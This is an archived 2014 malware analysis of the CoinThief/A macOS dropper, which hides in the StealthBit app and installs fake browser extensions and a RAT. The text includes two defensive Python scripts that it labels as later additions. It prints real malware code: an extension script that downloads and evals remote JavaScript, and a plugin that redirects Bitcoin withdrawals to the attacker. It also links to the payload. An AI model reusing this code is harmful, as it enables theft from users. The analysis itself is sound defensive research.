{
	"id": "b1840e9c-48e7-4f92-87e8-bb7dfa7fc8a4",
	"created_at": "2026-04-06T00:17:54.367509Z",
	"updated_at": "2026-04-10T13:12:06.203849Z",
	"deleted_at": null,
	"sha1_hash": "4f1fc9a2d493de08a35891c9ab76d89b837bd902",
	"title": "Analysis of CoinThief/A \"dropper\"",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 868684,
	"plain_text": "Analysis of CoinThief/A \"dropper\"\r\nBy fG!\r\nPublished: 2014-02-16 · Archived: 2026-04-05 22:58:23 UTC\r\nThere is no such thing as malware in OS X, but last week another sample was spotted and made the “news”. I am talking about CoinThief, a malware designed to hijack Bitcoin accounts and steal everything (I must confess I laughed a bit; I think Bitcoin is just a bullshit pyramid scheme, but I digress).\r\nThere are a few samples out there, in different stages of evolution, so this is probably not a very recent operation. Nicholas Ptacek from SecureMac broke the story and did an initial analysis. Check his link here and also ThreatPost for some details about the different infected applications and how it started.\r\nThis post will target the initial stage of the malware packed with the StealthBit application, and go a bit into the installed malware browser extensions.\r\nThe first step is to load the main binary into IDA or Hopper (I still use IDA, mostly out of laziness and habit). We are presented with this nice picture (not all methods shown) of very weird class and method names.\r\nhttps://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/\r\nPage 1 of 13\n\nThis draws immediate attention, which is not good at all if you are trying to avoid attention. 
Another example, this time from class-dump:\r\n__attribute__((visibility(\"hidden\")))\r\n@interface IOSDJDSNSDOWKDII : NSObject\r\n{\r\n NSString *_fihwjsndkfkjs;\r\n NSString *_hisdhiwjknsk;\r\n NSString *_sdhijkskjdfd;\r\n}\r\n@property(copy, nonatomic) NSString *sdhijkskjdfd; // @synthesize sdhijkskjdfd=_sdhijkskjdfd;\r\n@property(copy, nonatomic) NSString *hisdhiwjknsk; // @synthesize hisdhiwjknsk=_hisdhiwjknsk;\r\n@property(copy, nonatomic) NSString *fihwjsndkfkjs; // @synthesize fihwjsndkfkjs=_fihwjsndkfkjs;\r\n- (void).cxx_destruct;\r\n- (BOOL)hidfisdfsguiwomc;\r\n- (id)initWiwijmxug:(id)arg1 jifikwdff:(id)arg2 mkoxjnwhd:(id)arg3;\r\nThe strings are also a good starting point for understanding the puzzle. It’s easy to spot base64-encoded strings, confirmed by the presence of base64 methods. (The q24@?0@\"NSString\"8@\"NSString\"16 entry in between is not base64: it is an Objective-C type encoding for a block taking two NSString arguments and returning a long long, which the strings window happens to list alongside them.)\r\nbGFzdENocm9tZVBha1BhdGNoZWRWZXJzaW9u\r\nL0FwcGxpY2F0aW9ucy9Hb29nbGUgQ2hyb21lLmFwcC9Db250ZW50cy9WZXJzaW9ucw==\r\nq24@?0@\"NSString\"8@\"NSString\"16\r\nR29vZ2xlIENocm9tZSBGcmFtZXdvcmsuZnJhbWV3b3JrL1Jlc291cmNlcw==\r\nRXh0ZW5zaW9uU2V0dGluZ3MucmV0dXJuRXh0ZW5zaW9uc0RhdGEgPSBmdW5jdGlvbihleHRlbnNpb25zRGF0YSkgewogICAgLy8gV2UgY2FuIGdl\r\nRXh0ZW5zaW9uU2V0dGluZ3MucmV0dXJuRXh0ZW5zaW9uc0RhdGEgPSBmdW5jdGlvbihleHRlbnNpb25zRGF0YSkgewpmb3IodmFyIGE9MCxiPWV4\r\nThe three short ones decode to lastChromePakPatchedVersion, /Applications/Google Chrome.app/Contents/Versions and Google Chrome Framework.framework/Resources; the two long ones are the truncated beginning of a JavaScript function, ExtensionSettings.returnExtensionsData = function(extensionsData) {, in two variants.\r\nAt this point we know we have a binary with obfuscated strings and class/method names. Different strategies are possible to continue the analysis and reversing. DTrace and similar utilities can be used to get a general overview of what the binary is trying to do, or we can go directly into IDA and start making sense of the code. In the second option we can start reversing at main(), or we can start checking what the obfuscated methods are trying to do and rename them to something meaningful. I am a great fan of the second, so I started checking each method sequentially.\r\nThe getter and setter methods are easy to spot. 
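To turn a strings listing like the one above into something readable, here is a small string-triage script. It is an added example written for this page, not code from the original post: it decides which entries look like base64 (alphabet only, length a multiple of four, at most two padding characters), decodes them, and keeps only those that come out as printable text, so obfuscated identifiers that merely happen to fit the alphabet (IOSDJDSNSDOWKDII is sixteen characters long and passes the shape test) are dropped. The sample list is constructed from the strings shown above plus two decoys; nothing is read from the binary.

```python
import base64
import re
import string

# Shape test for base64: alphabet only, at least 16 chars, up to two '=' of padding.
B64_RE = re.compile(r'^[A-Za-z0-9+/]{16,}={0,2}$')
PRINTABLE = set(string.printable)

# Constructed sample: the base64 strings listed above, the Objective-C type
# encoding that sits between them, and two obfuscated identifiers as decoys.
TYPE_ENCODING = ('q24@?0@' + chr(34) + 'NSString' + chr(34) + '8@'
                 + chr(34) + 'NSString' + chr(34) + '16')
SAMPLE_STRINGS = [
    'bGFzdENocm9tZVBha1BhdGNoZWRWZXJzaW9u',
    'L0FwcGxpY2F0aW9ucy9Hb29nbGUgQ2hyb21lLmFwcC9Db250ZW50cy9WZXJzaW9ucw==',
    TYPE_ENCODING,
    'R29vZ2xlIENocm9tZSBGcmFtZXdvcmsuZnJhbWV3b3JrL1Jlc291cmNlcw==',
    'RXh0ZW5zaW9uU2V0dGluZ3MucmV0dXJuRXh0ZW5zaW9uc0RhdGEgPSBmdW5jdGlvbihleHRlbnNpb25zRGF0YSkgewogICAgLy8gV2UgY2FuIGdl',
    'RXh0ZW5zaW9uU2V0dGluZ3MucmV0dXJuRXh0ZW5zaW9uc0RhdGEgPSBmdW5jdGlvbihleHRlbnNpb25zRGF0YSkgewpmb3IodmFyIGE9MCxiPWV4',
    'IOSDJDSNSDOWKDII',
    'HIFOWEIOWEOJSDJFIVB',
]

def looks_base64(s):
    # Base64 text is a multiple of four characters once padding is counted.
    return bool(B64_RE.match(s)) and len(s) % 4 == 0

def decode_candidate(s):
    # Returns the decoded text, or None if the bytes are not printable ASCII text.
    try:
        raw = base64.b64decode(s, validate=True)
    except ValueError:
        return None
    text = raw.decode('ascii', errors='replace')
    if not text or any(ch not in PRINTABLE for ch in text):
        return None
    return text

def triage_strings(lines):
    # (encoded, decoded) pairs for every entry that survives both checks.
    hits = []
    for line in lines:
        s = line.strip()
        if looks_base64(s):
            decoded = decode_candidate(s)
            if decoded is not None:
                hits.append((s, decoded))
    return hits

def triage_page_strings():
    return triage_strings(SAMPLE_STRINGS)

if __name__ == '__main__':
    # Feed it the output of strings(1) on a real binary instead of the sample list.
    for encoded, decoded in triage_page_strings():
        print(encoded[:24] + '...  ->  ' + repr(decoded))
```

The printability filter is what makes this usable on a whole strings dump: without it, every sixteen-plus-character identifier that happens to avoid underscores and digits would show up as a decoded blob of garbage.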
The setter methods start with set in the name because they are automatically generated by the property keyword, and the getters are easy because their code just returns the instance variable. The obfuscator is probably a script that modifies the names before compilation (I don’t think a define is enough for this), an LLVM pass, or the code was simply developed with those names.\r\nNow let me show you a very simple method that writes a mutex (really just a marker file) to ~/Library/Preferences/fsdiskquota1. If this file is present, it means that the dropper code was previously executed and it should not run again.\r\nThe base64 string is decoded, the tilde is expanded to the full path, and the fsdiskquota1 mutex is written. Nothing very complicated.\r\nThe trick here is to start renaming the methods so you can easily follow the code. That is the annoying part of this obfuscation method, but with a small dose of patience and time it falls apart. Renamed and commented method:\r\nTo make it easier for you, this is a screenshot of the methods I renamed. Not all of them, but the most important ones to understand what the dropper does.\r\nThe init method for the class HIFOWEIOWEOJSDJFIVB initializes an instance variable with an NSFileManager object and retrieves the location of the currently logged-in user’s NSLibraryDirectory. Then what I renamed as startBackdoor is called and the fun starts.\r\nThis method does the following:\r\nErases itself and replaces it with the original StealthBit binary.\r\nStarts the original binary. 
At this point you have the original application running and the dropper, which will continue its work in the background.\r\nVerifies if the mutex exists.\r\nIf the mutex does not exist, writes it and continues unpacking the malware payload.\r\nBrowser extensions for Safari and Chrome are unpacked into a temporary folder.\r\nIf the unpack was successful, the Safari version is retrieved. The extensions are only compatible with Safari 5 or higher.\r\nInstalls the Safari extension, which is masked as a pop-up blocker.\r\nRetrieves the Chrome version (if installed). Only Chrome v25 or higher is supported.\r\nInstalls the Chrome extension.\r\nVerifies if the Library/Handsoff folder exists (Hands Off! is a third-party outbound firewall).\r\nIf Hands Off! is not installed, the backdoor is made persistent by creating a fake Google Software Update launch agent; presumably the authors would rather skip persistence than trip a firewall alert.\r\nRemoves temporary files and exits.\r\nAt this point, and assuming the whole process was successful against Safari, Chrome, and persistence, we have two malware extensions loaded into the browsers and a RAT installed on the target machine. Two screenshots of the startBackdoor method:\r\nThe original binary is located in the _CodeSignature folder and named .dSYM. The extensions are located in the same folder in a bzip2 archive named .sig (a legitimate _CodeSignature folder holds only the CodeResources file, so extra entries there are a useful triage signal). The dropper does not show in the Dock because the LSUIElement setting is used in the Info.plist. When the dropper erases itself, the setting is removed from the plist so the legit application shows up in the Dock. For the user everything looks normal: application startup time is fast. The original application is started by creating a new NSTask and using the open command to start the now legit StealthBit.app again.\r\nThe functions that install the extensions are not very interesting in terms of reversing. 
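With the dropper behaviour and the on-disk layout above, a host sweep falls out almost directly. The script below is an added example written for this page, not code from the original post. It checks a home directory for the fsdiskquota1 marker, for the RAT install directory the post names later (~/Library/Application Support/.com.google.softwareUpdateAgent), and for any launch agent in ~/Library/LaunchAgents whose Program or ProgramArguments point into that directory, because the post gives only the disguise (Google Software Update) and not the plist label; it also inspects an application bundle for files stashed in Contents/_CodeSignature, where a legitimate bundle has only CodeResources. The infected layout it builds in a temp directory is constructed for the demo, and the launch agent label in it is invented. Other samples of this family (the post mentions several, in different stages of evolution) may use different names, so treat these as indicators for this sample rather than a family-wide signature.

```python
import os
import plistlib
import tempfile

# Host artifacts named in the post (relative to the home directory).
MARKER = os.path.join('Library', 'Preferences', 'fsdiskquota1')
RAT_DIR = os.path.join('Library', 'Application Support', '.com.google.softwareUpdateAgent')
LAUNCH_AGENTS = os.path.join('Library', 'LaunchAgents')
RAT_TOKEN = '.com.google.softwareUpdateAgent'
# A genuine Contents/_CodeSignature directory holds CodeResources and nothing else.
LEGIT_CODESIG = {'CodeResources'}

def agent_targets(plist_path):
    # Everything a launchd plist can execute: Program plus ProgramArguments.
    try:
        with open(plist_path, 'rb') as fp:
            data = plistlib.load(fp)
    except Exception:
        return []
    targets = []
    if isinstance(data.get('Program'), str):
        targets.append(data['Program'])
    args = data.get('ProgramArguments')
    if isinstance(args, list):
        targets.extend(a for a in args if isinstance(a, str))
    return targets

def sweep_home(home):
    # Returns (indicator, path) pairs; an empty list means nothing was found.
    hits = []
    marker = os.path.join(home, MARKER)
    if os.path.exists(marker):
        hits.append(('dropper-marker', marker))
    rat = os.path.join(home, RAT_DIR)
    if os.path.isdir(rat):
        hits.append(('rat-install-dir', rat))
    agents = os.path.join(home, LAUNCH_AGENTS)
    if os.path.isdir(agents):
        for name in sorted(os.listdir(agents)):
            path = os.path.join(agents, name)
            if name.endswith('.plist') and any(RAT_TOKEN in t for t in agent_targets(path)):
                hits.append(('rat-launch-agent', path))
    return hits

def scan_app_bundle(app_path):
    # Flags anything stashed in Contents/_CodeSignature besides CodeResources
    # (the dropper keeps the real binary there as .dSYM and the extensions as .sig).
    codesig = os.path.join(app_path, 'Contents', '_CodeSignature')
    if not os.path.isdir(codesig):
        return []
    extra = sorted(set(os.listdir(codesig)) - LEGIT_CODESIG)
    return [('stashed-in-codesignature', os.path.join(codesig, n)) for n in extra]

def build_demo_home(home):
    # Constructed infected layout for offline testing. The launch agent label and
    # file name are assumptions: the post only says it mimics Google Software Update.
    os.makedirs(os.path.join(home, 'Library', 'Preferences'))
    open(os.path.join(home, MARKER), 'w').close()
    os.makedirs(os.path.join(home, RAT_DIR))
    os.makedirs(os.path.join(home, LAUNCH_AGENTS))
    agent = {'Label': 'demo.fake.google.softwareupdate', 'RunAtLoad': True,
             'ProgramArguments': [os.path.join(home, RAT_DIR, 'Agent')]}
    with open(os.path.join(home, LAUNCH_AGENTS, 'demo.fake.google.softwareupdate.plist'), 'wb') as fp:
        plistlib.dump(agent, fp)
    with open(os.path.join(home, LAUNCH_AGENTS, 'benign.plist'), 'wb') as fp:
        plistlib.dump({'Label': 'benign', 'Program': '/usr/bin/true'}, fp)
    codesig = os.path.join(home, 'Demo.app', 'Contents', '_CodeSignature')
    os.makedirs(codesig)
    for name in ('CodeResources', '.dSYM', '.sig'):
        open(os.path.join(codesig, name), 'w').close()
    return os.path.join(home, 'Demo.app')

def demo():
    # Runs both checks against the constructed layout in a fresh temp directory.
    home = tempfile.mkdtemp()
    app = build_demo_home(home)
    return sweep_home(home), scan_app_bundle(app)

if __name__ == '__main__':
    import sys
    findings = sweep_home(os.path.expanduser('~'))
    for app in sys.argv[1:]:
        findings.extend(scan_app_bundle(app))
    for kind, path in findings:
        print(kind, path)
    sys.exit(1 if findings else 0)
```

Run it with the paths of downloaded .app bundles as arguments; it sweeps the current user’s home, prints each finding, and exits non-zero if anything matched. The bundle check is the one worth running before launching a download, since the marker, the RAT directory and the launch agent only appear after the dropper has already done its work.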
They locate the extension folders and install/activate the malware extension. The Chrome-related methods are a bit more complex because they look up more information about Chrome’s internals and mess with the .pak resource files and so on (the Chrome paths and the lastChromePakPatchedVersion key among the base64 strings above match this code). I don’t know much about Chrome’s internal organization and wasn’t much interested in reversing them; nothing valuable to me in terms of understanding the whole process.\r\nNow a bit into the extensions, using the Safari version as reference. As previously said, it is spoofed as a Pop-Up Blocker made by Eric Wong using KangoExtensions. The contents of the description file are:\r\n{\r\n \"kango_version\": \"1.3.0 d6f8f2cf3761\",\r\n \"content_scripts\": [\r\n \"libs/jquery-2.0.3.min.js\",\r\n \"injected/main.js\"\r\n ],\r\n \"name\": \"Pop-Up Blocker\",\r\n \"creator\": \"Eric Wong\",\r\n \"kango_package_id\": \"dev\",\r\n \"background_scripts\": [\r\n \"libs/jquery-2.0.3.min.js\",\r\n \"settings/defaultSettings.js\",\r\n \"settings/settings.js\",\r\n \"global/encryption/jsEncrypt.js\",\r\n \"global/encryption/updateVerifySignature.js\",\r\n \"global/cryptoJS/components/core-min.js\",\r\n \"global/cryptoJS/components/enc-base64-min.js\",\r\n \"global/cryptoJS/components/sha1-min.js\",\r\n \"global/cryptoJS/rollups/aes.js\",\r\n \"global/cryptoJS/rollups/md5.js\",\r\n \"global/cryptoJS/rollups/tripledes.js\",\r\n \"global/jsrsasign/ext/jsbn-min.js\",\r\n \"global/jsrsasign/ext/jsbn2-min.js\",\r\n \"global/jsrsasign/ext/base64-min.js\",\r\n \"global/jsrsasign/ext/rsa-min.js\",\r\n \"global/jsrsasign/ext/rsa2-min.js\",\r\n \"global/jsrsasign/asn1hex-1.1.min.js\",\r\n \"global/jsrsasign/rsapem-1.1.min.js\",\r\n \"global/jsrsasign/rsasign-1.2.min.js\",\r\n \"global/jsrsasign/x509-1.1.min.js\",\r\n \"global/jsrsasign/crypto-1.1.min.js\",\r\n \"background.js\"\r\n ],\r\n \"homepage_url\": \"http://kangoextensions.com/\",\r\n \"version\": \"1.0.0\",\r\n \"id\": 
\"com.optimalcycling.safari.popupblocker\",\r\n \"description\": \"Blocks pop-up windows and other annoyances.\"\r\n}\r\nScreenshot of the Safari extension:\r\nThe Kango stuff is mostly uninteresting except for the background.js file. What it does is try to contact a remote server and download a file, which is the effective malware payload responsible for hijacking the account information for the Bitcoin sites.\r\nif(!kango.storage.getItem('installed')) {\r\n //Get first version and run\r\n $.get(settings.get('reportServer')+\"/updates/firstUpdate.php\", function(data) {\r\n //Checking signature\r\n if(updateVerifySignature(CryptoJS.SHA1(data.global), CryptoJS.SHA1(data.injected), data.signature)) {\r\n //Saving to localstorage\r\n kango.storage.setItem('globalJS',data.global);\r\n kango.storage.setItem('injectedJS',data.injected);\r\n kango.storage.setItem('installed',true);\r\n //Saving current version\r\n kango.storage.setItem('extensionUpdateTimestamp',0);\r\n kango.storage.setItem('agentUpdateTimestamp',0);\r\n //Executing script\r\n eval(kango.storage.getItem('globalJS'));\r\n if(settings.get('debug')) console.log(\"Valid First Release\");\r\n } else {\r\n if(settings.get('debug')) console.log(\"First Release: Bad Signature\");\r\n }\r\n }, \"json\" );\r\n} else {\r\n //Running saved version\r\n try {\r\n eval(kango.storage.getItem('globalJS'));\r\n } catch(err) {\r\n if(kango.storage.getItem('globalJS_old')) {\r\n kango.storage.setItem('globalJS', kango.storage.getItem('globalJS_old'));\r\n } else {\r\n //Error in version 0, resetting extension.\r\n kango.storage.clear();\r\n }\r\n }\r\n}\r\nif(settings.get('debug')) {\r\n function uninstall() {\r\n console.log(\"Uninstalling...\");\r\n kango.storage.clear();\r\n }\r\n}\r\nOn first run the extension fetches reportServer/updates/firstUpdate.php, expects JSON with global, injected and signature fields, checks the signature over the SHA1 hashes of the two scripts (updateVerifySignature, backed by the bundled jsrsasign RSA code), stores both scripts in kango.storage and evals the global one. On later runs it just evals the stored copy, restoring globalJS_old or wiping the storage if that throws. The operator can therefore replace the injected logic at will without reinstalling the extension, and, as long as the verification is sound, nobody else can push a payload to it without the signing key. A screenshot of the connection attempt to the remote 
server:\r\nIf you are interested in looking at the contents of the malware payload, just download it here. The password is “infected!”. You can find JavaScript code such as this sample for the MtGoxPlugin:\r\n MtGoxPlugin.prototype.injectPage = function (withdrawKey) {\r\n function injectScript(source) {\r\n var elem = document.createElement(\"script\");\r\n elem.type = \"text/javascript\";\r\n elem.innerHTML = source;\r\n document.head.appendChild(elem);\r\n }\r\n var balance = Math.round((parseFloat($('#virtualCur span').text().match(/(.*)\\\\s/)[1])-0.001)*100000000)\r\n injectScript(\"var pubKey = '\"+ withdrawKey +\"'; balanceBTC = '\"+ balance +\"'; \"+\r\n \"(\"+(function() {\r\n $.ajaxSetup({\r\n beforeSend: function(jqXHR, settings) {\r\n if(settings.url == '/api/2/money/bitcoin/send_simple') {\r\n settings.data = settings.data.replace(/amount=.*\\\\\u0026address=/, 'amount='+ balanceBTC +'\u0026a\r\n settings.data = settings.data.replace(/address=.*\\\\\u0026address/, 'address='+ pubKey +'\u0026addr\r\n }\r\n }});\r\n }).toString()+\")()\");\r\n };\r\nThe plugin reads the current balance from the page, injects a script that hooks jQuery’s ajax beforeSend, and when the page submits a withdrawal to /api/2/money/bitcoin/send_simple it rewrites the POST body so that the amount becomes the whole balance minus 0.001 BTC (converted to satoshis) and the destination address becomes the attacker’s withdrawKey. The user fills in a normal withdrawal form; the money goes elsewhere.\r\nThe last step is to reverse the RAT, a binary called Agent and installed in ~/Library/Application Support/.com.google.softwareUpdateAgent. I did not reverse this module yet, but it appears to be responsible for sending data to the remote servers and also for remote access to the infected machines. It has a few obfuscated methods reused from the dropper, but everything else is not obfuscated. There is a method that verifies the presence of Little Snitch, which is funny because that doesn’t exist in the dropper. Probably some quality control issues! There’s also a method checking for 1Password.\r\nWhat else is there to say about this? 
I have at least five different infected applications, in different stages of evolution (some without obfuscated methods).\r\nAs far as I have read/know, they were available on popular download sites. Trust is a difficult problem to solve.\r\nWhat are the conclusions and lessons from this malware?\r\nThere’s some fuss around regarding my previous post about evil iTunes plugins, with a quite surprising number of “uninformed” people using the argument of “arbitrary code execution”. Well, the thing is that everything you download from the Internet is arbitrary code unless you reverse every single binary, and that has the strong assumption that you are able to understand everything it does. Quite a task, I might say!\r\nA normal-looking application can easily copy malicious payloads to many different places, iTunes plugins being one of the interesting targets, but it can also easily patch other applications, since most are installed with the same permissions as the normal user. There’s no need for exploits or suspicious please-gimme-r00t dialogs. Just an innocent app you download and trust. In the post-Snowden world, what guarantees do you have that famous apps don’t have state-sponsored payloads? None, I might say.\r\nThe open source bullshit principle of many eyes looking has been shown too many times to be a really bad assumption: not that many eyes are looking, and stupid bugs are kept alive for many years. Sandboxes and the App Store improve the situation, but they still suffer from vulnerabilities, and their binaries are probably more opaque (iOS in particular) and with fewer incentives to be reversed (Apple wouldn’t let malware into the App Store, right?).\r\nI will probably edit this post in the next days to add some missing info or improve some paragraphs. 
Too tired right now.\r\nHave fun,\r\nfG!\r\nSource: https://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://reverse.put.as/2014/02/16/analysis-of-cointhiefa-dropper/"
	],
	"report_names": [
		"analysis-of-cointhiefa-dropper"
	],
	"threat_actors": [],
	"ts_created_at": 1775434674,
	"ts_updated_at": 1775826726,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/4f1fc9a2d493de08a35891c9ab76d89b837bd902.pdf",
		"text": "https://archive.orkl.eu/4f1fc9a2d493de08a35891c9ab76d89b837bd902.txt",
		"img": "https://archive.orkl.eu/4f1fc9a2d493de08a35891c9ab76d89b837bd902.jpg"
	}
}